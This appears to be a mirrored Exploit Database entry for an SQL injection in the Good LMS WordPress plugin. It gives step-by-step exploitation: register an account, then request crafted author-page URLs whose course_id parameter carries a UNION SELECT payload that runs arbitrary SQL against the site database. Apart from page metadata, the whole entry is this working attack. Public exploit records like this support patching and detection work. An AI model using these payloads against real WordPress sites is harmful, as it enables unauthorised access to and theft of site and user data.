WordPress Plugin Learning Management System – ‘course_id’ SQL Injection

• Exploit Database
• 88 阅读

• 作者： Esecurity.ir
  日期： 2018-01-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43901/

• # Exploit Title: Good LMS - Learning Management System WP Plugin SQL 
  Injection
  # Date: 2018-01-24
  # Exploit Author: Esecurity.ir
  # Exploit Author Web Site: http://esecurity.ir
  # Special Thanks : Meisam Monsef [meisamrce@gmail.com] - Telegram ID : 
  @meisamrce
  # Vendor Homepage: https://goodlayers.com/
  # Version: All Version
  
  Exploit :
  
  	1 - First enter the link below and create an account
  	http://target.com/?register=1
  	2 - the exploit
  	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+[SQL+Command]%23
  	http://target.com/author/[your-username]/?type=scoring-status-student&course_id=-999999+union+select+1,2,3,user()%23
  

  Python

  Copy